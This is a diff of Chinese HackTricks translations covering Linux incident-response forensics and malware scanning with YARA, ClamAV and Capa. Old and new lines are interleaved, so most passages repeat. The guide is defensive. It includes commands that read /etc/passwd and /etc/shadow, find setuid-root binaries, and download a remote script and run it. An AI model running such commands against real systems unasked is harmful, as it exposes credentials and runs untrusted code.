* **/var/log/cron**:记录与Crond相关的消息cron作业。比如cron守护进程启动作业的时候
* **/var/log/daemon.log**:跟踪运行的后台服务,但不以图形方式表示它们
* **/var/log/btmp**:记录所有失败的登录尝试。
* **/var/log/httpd/**:包含 Apache httpd 守护程序的 error\_log 和 access\_log 文件的目录。所有 httpd 遇到的错误都记录**error\_log** 文件中。考虑内存问题和其他系统相关的错误。**access\_log** 记录通过 HTTP 进入的所有请求。
* **/var/log/mysqld.log** 或 **/var/log/mysql.log**记录每个调试、失败和成功消息的 MySQL 日志文件,包括 MySQL 守护程序 mysqld 的启动、停止和重启。系统根据目录决定。RedHat、CentOS、Fedora 和其他基于 RedHat 的系统使用 /var/log/mariadb/mariadb.log。然而Debian/Ubuntu 使用 /var/log/mysql/error.log 目录。
* **/var/log/xferlog**:保存 FTP 文件传输会话。包括文件名和用户发起的 FTP 传输等信息。
* **/var/log/\***:始终检查此目录中的意外日志
* **/var/log/httpd/**:包含Apache httpd守护进程的error\_log和access\_log文件的目录。httpd遇到的每个错误都保存**error\_log** 文件中。考虑内存问题和其他系统相关的错误。**access\_log** 记录通过HTTP收到的所有请求。
* **/var/log/mysqld.log** 或 **/var/log/mysql.log**MySQL日志文件记录每个调试、失败和成功消息包括MySQL守护进程mysqld的启动、停止和重启。系统决定目录。RedHat、CentOS、Fedora和其他基于RedHat的系统使用 /var/log/mariadb/mariadb.log。然而Debian/Ubuntu使用 /var/log/mysql/error.log 目录。
* **/var/log/xferlog**保存FTP文件传输会话。包括文件名和用户发起的FTP传输的信息。
* **/var/log/\*** : 您应该始终检查此目录中是否有意外的日志
{% hint style="info" %}
在入侵或恶意软件事件中Linux系统的日志和审计子系统可能被禁用或删除。由于Linux系统的日志通常包含有关恶意活动的最有用信息,入侵者经常删除它们。因此,在检查可用的日志文件时,重要的是查找可能表示删除或篡改的间隙或乱序条目
Linux系统日志和审计子系统可能在入侵或恶意软件事件中被禁用或删除。因为Linux系统上的日志通常包含有关恶意活动的最有用信息,入侵者经常删除它们。因此,在检查可用的日志文件时,寻找可能表明删除或篡改的间隙或顺序错误的迹象是很重要的
{% endhint %}
### 命令历史
许多Linux系统配置为为每个用户账户保留命令历史记录
许多Linux系统配置为为每个用户账户维护命令历史
* \~/.bash\_history
* \~/.history
@ -303,26 +308,27 @@ Linux使用几个配置文件在用户登录系统时自动启动可执行文件
使用命令 `last -Faiwx` 可以获取已登录用户的列表。\
建议检查这些登录是否合理:
* 有任何未知用户吗?
* 有任何不应该有shell登录的用户吗?
* 有未知用户吗?
* 有不应该登录shell的用户吗?
这很重要,因为**攻击者**有时可能将 `/bin/bash` 复制到 `/bin/false` 中,以便像 **lightdm** 这样的用户可以登录
这很重要,因为 **攻击者** 有时可能`/bin/bash` 复制到 `/bin/false` 中,这样像 **lightdm** 这样的用户可能 **能够登录**
请注意,您也可以通过阅读日志来查看此信息。
### 应用程序痕迹
请注意,您也可以通过阅读日志来查看这些信息。
* **SSH**: 使用SSH连接到受损系统或从受损系统连接到其他系统会在每个用户帐户的文件中留下记录_**/.ssh/authorized\_keys**_和_**/.ssh/known\_keys**_。这些记录可以揭示远程主机的主机名或IP地址。
* **Gnome桌面**: 用户帐户可能有一个_**/.recently-used.xbel**_文件其中包含有关在Gnome桌面上运行的应用程序最近访问的文件的信息。
* **VIM**: 用户帐户可能有一个_**/.viminfo**_文件其中包含有关VIM使用情况的详细信息包括搜索字符串历史和使用vim打开的文件的路径。
* **Open Office**: 最近使用的文件。
* **MySQL**: 用户帐户可能有一个_**/.mysql\_history**_文件其中包含使用MySQL执行的查询。
* **Less**: 用户帐户可能有一个_**/.lesshst**_文件其中包含有关less使用情况的详细信息包括搜索字符串历史和通过less执行的shell命令。
### 应用痕迹
* **SSH**使用SSH从受损系统到其他系统的连接会在每个用户账户的文件中产生条目_**/.ssh/authorized\_keys**_ 和 _**/.ssh/known\_keys**_。这些条目可以揭示远程主机的主机名或IP地址。
* **Gnome桌面**:用户账户可能有一个 _**/.recently-used.xbel**_ 文件其中包含使用在Gnome桌面上运行的应用程序访问的文件的信息。
* **VIM**:用户账户可能有一个 _**/.viminfo**_ 文件其中包含使用VIM的详细信息包括搜索字符串历史和使用vim打开的文件路径。
* **Open Office**:最近文件。
* **MySQL**:用户账户可能有一个 _**/.mysql\_history**_ 文件其中包含使用MySQL执行的查询。
* **Less**:用户账户可能有一个 _**/.lesshst**_ 文件其中包含使用less的详细信息包括搜索字符串历史和通过less执行的shell命令。
### USB日志
[**usbrip**](https://github.com/snovvcrash/usbrip)是一个用纯Python 3编写的小型软件用于解析Linux日志文件根据发行版的不同可能是`/var/log/syslog*`或`/var/log/messages*`以构建USB事件历史记录表。
[**usbrip**](https://github.com/snovvcrash/usbrip) 是一个用纯Python 3编写的小软件它解析Linux日志文件`/var/log/syslog*` 或 `/var/log/messages*`取决于发行版以构建USB事件历史表。
了解所有已使用的USB设备是很有趣的如果您有一个授权的USB设备列表那么查找"违规事件"使用不在该列表中的USB设备将更加有用。
了解所有已使用的USB非常有趣如果您有一个授权的USB列表找到“违规事件”未在该列表中的USB的使用将更有用。
### 安装
```
@ -330,94 +336,6 @@ pip3 install usbrip
usbrip ids download #Download USB ID database
```
### 示例
#### Example 1: Collecting Volatile Data
#### 示例 1收集易失性数据
To collect volatile data from a Linux system, you can use the following commands:
要从Linux系统中收集易失性数据可以使用以下命令
```bash
$ date
$ uname -a
$ ps aux
$ netstat -antp
$ ifconfig -a
```
#### Example 2: Collecting Disk Image
#### 示例 2收集磁盘镜像
To collect a disk image from a Linux system, you can use the following command:
要从Linux系统中收集磁盘镜像可以使用以下命令
```bash
$ dd if=/dev/sda of=/mnt/forensics/disk_image.dd
```
#### Example 3: Analyzing Disk Image
#### 示例 3分析磁盘镜像
To analyze a disk image in Linux, you can use the following commands:
要在Linux中分析磁盘镜像可以使用以下命令
```bash
$ file disk_image.dd
$ fdisk -l disk_image.dd
$ mmls disk_image.dd
$ mount -o loop,ro disk_image.dd /mnt/forensics/mount_point
$ ls -l /mnt/forensics/mount_point
$ cat /mnt/forensics/mount_point/etc/passwd
```
#### Example 4: Analyzing Log Files
#### 示例 4分析日志文件
To analyze log files in Linux, you can use the following commands:
要在Linux中分析日志文件可以使用以下命令
```bash
$ cat /var/log/syslog
$ cat /var/log/auth.log
$ cat /var/log/apache2/access.log
$ cat /var/log/apache2/error.log
```
#### Example 5: Analyzing Network Traffic
#### 示例 5分析网络流量
To analyze network traffic in Linux, you can use the following commands:
要在Linux中分析网络流量可以使用以下命令
```bash
$ tcpdump -i eth0 -w /mnt/forensics/network_traffic.pcap
$ tshark -r /mnt/forensics/network_traffic.pcap
```
#### Example 6: Analyzing Memory Dump
#### 示例 6分析内存转储
To analyze a memory dump in Linux, you can use the following commands:
要在Linux中分析内存转储可以使用以下命令
```bash
$ volatility -f memory_dump.raw imageinfo
$ volatility -f memory_dump.raw pslist
$ volatility -f memory_dump.raw netscan
$ volatility -f memory_dump.raw filescan
```
```
usbrip events history #Get USB history of your curent linux machine
usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR user
@ -425,112 +343,56 @@ usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR
usbrip ids download #Downlaod database
usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
```
更多示例和信息请参考GitHub[https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
更多示例和信息请访问GitHub[https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和自动化由全球最先进的社区工具提供支持的工作流程。\
使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建并**自动化工作流程**,这些工作流程由世界上**最先进**的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## 查用户账户和登录活动
## 查用户账户和登录活动
检查 _**/etc/passwd**_、_**/etc/shadow**_ 和 **安全日志**查找异常的名称或在已知未经授权事件附近创建或使用的账户。还要检查可能的sudo暴力攻击。\
此外,检查 _**/etc/sudoers**__**/etc/groups**_ 等文件,查找给用户授予的意外权限。\
最后,查找没有密码或密码容易猜测的账户。
检查 _**/etc/passwd**_、_**/etc/shadow**_ 和**安全日志**寻找不寻常的名称或账户特别是那些在已知未授权事件发生前后创建或使用的账户。同时检查可能发生的sudo暴力破解攻击。\
此外,检查 _**/etc/sudoers**__**/etc/groups**_ 文件,查看是否有给用户意外授权的情况。\
最后,寻找**没有密码**或**容易被猜到密码**的账户。
## 检查文件系统
文件系统数据结构可以提供与恶意软件事件相关的大量**信息**,包括事件的**时间**和**恶意软件**的实际**内容**。\
恶意软件越来越多地被设计为**阻碍文件系统分析**。一些恶意软件会更改恶意文件的日期时间戳,以使时间线分析更加困难。其他恶意代码被设计为仅将某些信息存储在内存中,以最小化存储在文件系统中的数据量。\
为了应对这些反取证技术,有必要**仔细关注文件系统日期时间戳的时间线分析**,以及存储在可能发现恶意软件的常见位置的文件。
文件系统数据结构可以提供大量**恶意软件**事件相关的**信息**,包括事件的**时间**和恶意软件的实际**内容**。\
**恶意软件**越来越多地被设计来**阻碍文件系统分析**。一些恶意软件会更改恶意文件的日期时间戳,使其更难通过时间线分析被找到。其他恶意代码被设计为仅将某些信息存储在内存中,以最小化文件系统中存储的数据量。\
为了应对这些反取证技术,需要**仔细关注文件系统日期时间戳的时间线分析**,以及恶意软件可能被发现的常见位置中存储的文件。
* 使用 **autopsy** 可以查看可能有助于发现可疑活动的事件时间线。您可以直接使用 **Sleuth Kit**`mactime` 功能。
* 检查 **$PATH** 内是否有意外的脚本可能是一些sh或php脚本
* `/dev` 中的文件曾经是特殊文件,您可能会在这里找到与恶意软件相关的非特殊文件。
* 查找异常或**隐藏的文件**和**目录**,例如“.. ”(点 空格)或“..^G ”(点 控制-G
* 系统上的 `/bin/bash` Setuid 副本 `find / -user root -perm -04000 print`
* 检查已删除的**inode的日期时间戳**如果在同一时间删除了大量文件则可能表明恶意活动例如安装了rootkit或木马服务。
* 由于inode是按照下一个可用的方式分配的因此在大约相同时间放置在系统上的恶意文件可能会被分配连续的inode。因此在找到恶意软件的一个组件之后检查相邻的inode可能会很有成效。
* 还要检查像 _/bin__/sbin_ 这样的目录,因为新文件或修改文件的**修改时间**可能很有趣。
* 按创建日期对目录中的文件和文件夹进行排序,以查看最近的文件或文件夹(通常是最后一个)。
* 使用 **autopsy** 可以查看可能有助于发现可疑活动的事件时间线。您可以直接使用 **Sleuth Kit**`mactime` 功能。
* 检查 **$PATH** 中的**意外脚本**可能是一些sh或php脚本
* `/dev` 中的文件过去是特殊文件,您可能会在这里找到与恶意软件相关的非特殊文件。
* 寻找不寻常或**隐藏的文件**和**目录**,例如“.. ”(点点空格)或“..^G ”(点点控制-G
* 系统上的/bin/bash的Setuid副本 `find / -user root -perm -04000 print`
* 审查已删除**inodes的日期时间戳查看是否有大量文件在同一时间被删除**这可能表明恶意活动如安装rootkit或木马化服务。
* 由于inodes是按下一个可用基础分配的**大约在同一时间放置在系统上的恶意文件可能会被分配连续的inodes**。因此在定位到恶意软件的一个组件后检查相邻的inodes可能会很有成效。
* 还要检查像 _/bin__/sbin_ 这样的目录,因为新文件或修改过的文件的**修改时间或更改时间**可能很有趣。
* 查看按创建日期而非字母顺序排序的目录中的文件和文件夹是很有趣的,以便查看哪些文件或文件夹是最新的(通常是最后的文件夹)。
您可以使用 `ls -laR --sort=time /bin` 检查文件夹中最近的文件。\
您可以使用 `ls -lai /bin |sort -n` 检查文件夹中文件的inode。
您可以使用 `ls -laR --sort=time /bin` 检查文件夹中最新的文件\
您可以使用 `ls -lai /bin |sort -n` 检查文件夹内文件的inodes
{% hint style="info" %}
请注意,**攻击者**可以**修改时间**以使**文件看起来合法**,但他**无法修改inode**。如果您发现一个文件表明它的创建和修改时间与同一文件夹中的其他文件相同,但是**inode**却**意外地更大**,那么该文件的时间戳已被修改
请注意,**攻击者**可以**修改**文件的**时间**以使文件看起来**合法**,但他**不能**修改**inode**。如果您发现一个**文件**显示它是在与同一文件夹中其他文件**同时**创建和修改的,但**inode**却**异常地大**,那么该文件的**时间戳被修改过**
{% endhint %}
## 比较不同文件系统版本的文件
#### 查找添加的文件
#### 查找新增文件
```bash
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/
```
#### 查找修改的内容
When conducting a forensic investigation on a Linux system, it is important to identify any modified content that may be relevant to the case. This can include modified files, directories, or system configurations.
To find modified content, you can use various tools and techniques. One common approach is to compare the current state of the system with a known good state. This can be done by creating a baseline of the system's files and configurations, and then comparing it with the current state.
One tool that can be used for this purpose is the `find` command. By using the `-newer` option, you can search for files that have been modified after a specific date and time. For example, the following command will find all files modified within the last 24 hours:
```
find / -type f -newermt "24 hours ago"
```
You can also use the `stat` command to obtain detailed information about a file, including its modification time. For example, the following command will display the modification time of a file:
```
stat <file_path>
```
Additionally, you can check the system logs for any suspicious activities or modifications. The `/var/log` directory contains various log files that can provide valuable information about system events.
By identifying and analyzing modified content, you can gain insights into the actions taken on the system and potentially uncover evidence relevant to your investigation.
#### 查找修改过的内容
```bash
git diff --no-index --diff-filter=M _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ | grep -E "^\+" | grep -v "Installed-Time"
```
#### 查找已删除的文件
When conducting Linux forensics, it is important to be able to find deleted files. Even though a file may have been deleted, it is often still recoverable from the file system.
在进行Linux取证时能够找到已删除的文件非常重要。即使文件已被删除通常仍然可以从文件系统中恢复。
One way to find deleted files is by using the `grep` command to search for specific file signatures within the unallocated space of a disk image. File signatures are unique patterns of bytes that can be used to identify the file type.
一种查找已删除文件的方法是使用`grep`命令在磁盘镜像的未分配空间中搜索特定的文件签名。文件签名是用于识别文件类型的唯一字节模式。
To search for deleted files using `grep`, you can use the following command:
使用`grep`搜索已删除文件,可以使用以下命令:
```bash
grep -a -b -E -o -P '<file_signature>' <disk_image>
```
- The `-a` option treats the disk image as a text file.
- The `-b` option prints the byte offset of the matching pattern.
- The `-E` option enables extended regular expressions.
- The `-o` option prints only the matching part of the line.
- The `-P` option enables Perl-compatible regular expressions.
- `-a`选项将磁盘镜像视为文本文件。
- `-b`选项打印匹配模式的字节偏移量。
- `-E`选项启用扩展正则表达式。
- `-o`选项仅打印行的匹配部分。
- `-P`选项启用Perl兼容的正则表达式。
Replace `<file_signature>` with the specific file signature you want to search for, and `<disk_image>` with the path to the disk image file.
将`<file_signature>`替换为要搜索的特定文件签名,将`<disk_image>`替换为磁盘镜像文件的路径。
By searching for file signatures within the unallocated space, you may be able to find deleted files that can provide valuable evidence during a forensic investigation.
通过在未分配空间中搜索文件签名,您可能能够找到已删除的文件,这些文件可以在取证调查中提供有价值的证据。
```bash
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/
```
@ -538,11 +400,11 @@ git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2
**`-diff-filter=[(A|C|D|M|R|T|U|X|B)…​[*]]`**
仅选择已添加(`A`)、已复制(`C`)、已删除(`D`)、已修改(`M`)、已重命名(`R`)以及其类型(即常规文件、符号链接、子模块等)已更改(`T`)、未合并(`U`)、未知(`X`)或已破坏配对(`B`)的文件。可以使用任意组合的过滤字符(包括无)。当将`*`(全部或无)添加到组合中时,如果比较中存在与其他条件匹配的文件,则选择所有路径;如果没有与其他条件匹配的文件,则不选择任何内容。
仅选择被添加(`A`)、复制(`C`)、删除(`D`)、修改(`M`)、重命名(`R`)的文件,以及那些类型(即常规文件、符号链接、子模块等)发生变化(`T`)、未合并(`U`)、未知(`X`)或配对破裂(`B`)的文件。可以使用过滤字符的任意组合(包括无)。当组合中添加了 `*`(全部或无)时,如果比较中有任何文件符合其他条件,则选择所有路径;如果没有文件符合其他条件,则不选择任何内容。
此外,这些大写字母可以转换为小写字母以进行排除。例如,`--diff-filter=ad`排除已添加和已删除的路径。
此外,**这些大写字母可以小写来排除**。例如 `--diff-filter=ad` 排除了添加和删除的路径。
请注意,并非所有的差异都可以包含所有类型。例如,从索引到工作树的差异永远不会有已添加的条目(因为差异中包含的路径集受限于索引中的内容)。类似地,如果禁用了对复制和重命名类型的检测,那么复制和重命名条目将不会出现。
请注意,并非所有差异都能展示所有类型。例如,从索引到工作树的差异永远不会有添加条目(因为差异包含的路径集受到索引中内容的限制)。同样,如果禁用了这些类型的检测,则复制和重命名条目也不会出现。
## 参考资料
@ -553,20 +415,20 @@ git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
你在一家**网络安全公司**工作吗想要在HackTricks中**宣传你的公司**吗?或者你想要**获取最新版本的PEASS或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
您在**网络安全公司**工作吗?您想在**HackTricks**中看到您的**公司广告**吗?或者您想要访问**最新版本的 PEASS 或下载 HackTricks 的 PDF**吗?查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[NFT收藏品](https://opensea.io/collection/the-peass-family)——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)系列
* 获取[**官方的 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f)或[**telegram 群组**](https://t.me/peass)或在**Twitter**上**关注**我 [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
**通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
通过向[**hacktricks 仓库**](https://github.com/carlospolop/hacktricks)和[**hacktricks-cloud 仓库**](https://github.com/carlospolop/hacktricks-cloud)提交 PR 来**分享您的黑客技巧**。
</details>
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和自动化由全球最先进的社区工具提供支持的工作流程。\
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建并**自动化工作流程**,由世界上**最先进**的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

218
forensics/basic-forensic-methodology/malware-analysis.md
View file

@ -2,17 +2,19 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习AWS黑客技术成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS红队专家)</strong></a><strong></strong></summary>
* 你在一家**网络安全公司**工作吗?你想在 HackTricks 中看到你的**公司广告**吗?或者你想获得**PEASS 的最新版本或下载 HackTricks 的 PDF 版本**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家 NFT 收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 上**关注**我 [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向** [**hacktricks 仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud 仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交 PR 来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## 取证备忘单
## 取证速查表
[https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/)
@ -34,37 +36,21 @@ sudo apt-get install -y yara
```
#### 准备规则
使用此脚本从 GitHub 下载并合并所有的 YARA 恶意软件规则:[https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
创建名为 _**rules**_ 的目录并执行该脚本。这将创建一个名为 _**malware\_rules.yar**_ 的文件,其中包含所有的恶意软件 YARA 规则。
使用此脚本从github下载并合并所有的yara恶意软件规则:[https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
创建 _**rules**_ 目录并执行它。这将创建一个名为 _**malware\_rules.yar**_ 的文件其中包含所有针对恶意软件的yara规则。
```bash
wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
mkdir rules
python malware_yara_rules.py
```
#### 扫描
Performing a thorough scan of the system is an essential step in malware analysis. The purpose of the scan is to identify any suspicious files, processes, or network connections that may indicate the presence of malware.
执行系统的彻底扫描是恶意软件分析中的一个重要步骤。扫描的目的是识别可能表明恶意软件存在的任何可疑文件、进程或网络连接。
There are several tools and techniques that can be used for scanning, including antivirus software, network monitoring tools, and file analysis tools. These tools can help identify known malware signatures, detect abnormal behavior, and analyze the structure and content of suspicious files.
有几种工具和技术可用于扫描,包括防病毒软件、网络监控工具和文件分析工具。这些工具可以帮助识别已知的恶意软件签名,检测异常行为,并分析可疑文件的结构和内容。
During the scan, it is important to collect as much information as possible about the suspicious files or processes. This includes file hashes, process IDs, network connections, and any other relevant details. This information will be useful for further analysis and investigation.
在扫描过程中收集有关可疑文件或进程的尽可能多的信息非常重要。这包括文件哈希、进程ID、网络连接和其他相关细节。这些信息将有助于进一步的分析和调查。
Once the scan is complete, the results should be carefully reviewed and analyzed. Any identified malware or suspicious activity should be further investigated to determine its nature, impact, and potential mitigation strategies.
扫描完成后,应仔细审查和分析结果。任何已识别的恶意软件或可疑活动都应进一步调查,以确定其性质、影响和潜在的缓解策略。
```bash
yara -w malware_rules.yar image #Scan 1 file
yara -w malware_rules.yar folder #Scan the whole folder
```
#### YaraGen: 检查恶意软件并创建规则
#### YaraGen检查恶意软件和创建规则
您可以使用工具[**YaraGen**](https://github.com/Neo23x0/yarGen)从二进制文件生成yara规则。查看这些教程[**第1部分**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/)[**第2部分**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/)[**第3部分**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
您可以使用工具 [**YaraGen**](https://github.com/Neo23x0/yarGen) 从二进制文件生成yara规则。查看这些教程[**第1部分**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/)[**第2部分**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/)[**第3部分**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
```bash
python3 yarGen.py --update
python3.exe yarGen.py --excludegood -m ../../mals/
@ -72,120 +58,10 @@ python3.exe yarGen.py --excludegood -m ../../mals/
### ClamAV
#### 安装
To install ClamAV, you can use the following command:
```bash
sudo apt-get install clamav
```
After the installation is complete, you can update the virus database by running the following command:
```bash
sudo freshclam
```
#### Scanning Files
To scan a specific file or directory, use the following command:
```bash
clamscan [file/directory]
```
For example, to scan a file named `malware.exe`, you would run:
```bash
clamscan malware.exe
```
#### Scanning the Entire System
To scan the entire system, use the following command:
```bash
clamscan -r /
```
This will recursively scan all files and directories starting from the root directory (`/`).
#### Quarantine Infected Files
If ClamAV detects any infected files, you can quarantine them using the following command:
```bash
clamscan --remove [file/directory]
```
For example, to quarantine a file named `malware.exe`, you would run:
```bash
clamscan --remove malware.exe
```
#### Updating ClamAV
To update ClamAV to the latest version, use the following command:
```bash
sudo apt-get update && sudo apt-get upgrade clamav
```
#### Conclusion
ClamAV is a powerful antivirus tool that can help you detect and remove malware from your system. By following the steps outlined in this guide, you can install ClamAV, scan files and directories, quarantine infected files, and keep ClamAV up to date.
```
sudo apt-get install -y clamav
```
#### 扫描
Performing a scan is an essential step in malware analysis. It helps to identify and gather information about the malware sample. There are various scanning techniques that can be used, such as static analysis and dynamic analysis.
进行扫描是恶意软件分析的重要步骤。它有助于识别和收集有关恶意软件样本的信息。可以使用各种扫描技术,如静态分析和动态分析。
##### Static Analysis
静态分析
Static analysis involves examining the malware sample without executing it. This can be done by analyzing the file's structure, metadata, and code. Some common static analysis techniques include:
静态分析是在不执行恶意软件样本的情况下对其进行检查。这可以通过分析文件的结构、元数据和代码来完成。一些常见的静态分析技术包括:
- File signature analysis: Checking the file signature against known malware signatures.
- 文件签名分析:将文件签名与已知的恶意软件签名进行比对。
- String analysis: Searching for specific strings or keywords within the file.
- 字符串分析:在文件中搜索特定的字符串或关键字。
- Code analysis: Analyzing the code structure and logic to understand its functionality.
- 代码分析:分析代码结构和逻辑以了解其功能。
- Metadata analysis: Examining the file's metadata, such as file size, creation date, and author information.
- 元数据分析:检查文件的元数据,如文件大小、创建日期和作者信息。
##### Dynamic Analysis
动态分析
Dynamic analysis involves executing the malware sample in a controlled environment to observe its behavior. This can be done using techniques such as:
动态分析涉及在受控环境中执行恶意软件样本以观察其行为。可以使用以下技术来完成:
- Sandbox analysis: Running the malware in a virtualized environment to monitor its actions and interactions with the system.
- 沙盒分析:在虚拟化环境中运行恶意软件,以监视其与系统的操作和交互。
- Debugging: Analyzing the malware's execution using a debugger to trace its behavior and identify any malicious activities.
- 调试:使用调试器分析恶意软件的执行,以跟踪其行为并识别任何恶意活动。
- Network analysis: Monitoring the network traffic generated by the malware to understand its communication patterns and potential command and control (C2) servers.
- 网络分析监视恶意软件生成的网络流量以了解其通信模式和潜在的命令和控制C2服务器。
- Behavior analysis: Observing the malware's actions, such as file modifications, registry changes, and process creation, to determine its impact on the system.
- 行为分析:观察恶意软件的行为,如文件修改、注册表更改和进程创建,以确定其对系统的影响。
By combining static and dynamic analysis techniques, analysts can gain a comprehensive understanding of the malware's characteristics and behavior. This information is crucial for further analysis and developing effective countermeasures.
通过结合静态和动态分析技术,分析人员可以全面了解恶意软件的特征和行为。这些信息对进一步的分析和制定有效的对策至关重要。
```bash
sudo freshclam #Update rules
clamscan filepath #Scan 1 file
@ -193,25 +69,25 @@ clamscan folderpath #Scan the whole folder
```
### [Capa](https://github.com/mandiant/capa)
**Capa**检测可执行文件PE、ELF、.NET中的潜在恶意功能。因此它可以发现诸如Att\&ck战术或可疑功能的事物,例如:
**Capa** 可以检测可执行文件中潜在的恶意**能力**PE、ELF、.NET。因此它会发现例如 Att\&ck 战术,或者可疑能力,例如:
- 检查OutputDebugString错误
- 作为服务运行
- 创建进程
* 检查 OutputDebugString 错误
* 作为服务运行
* 创建进程
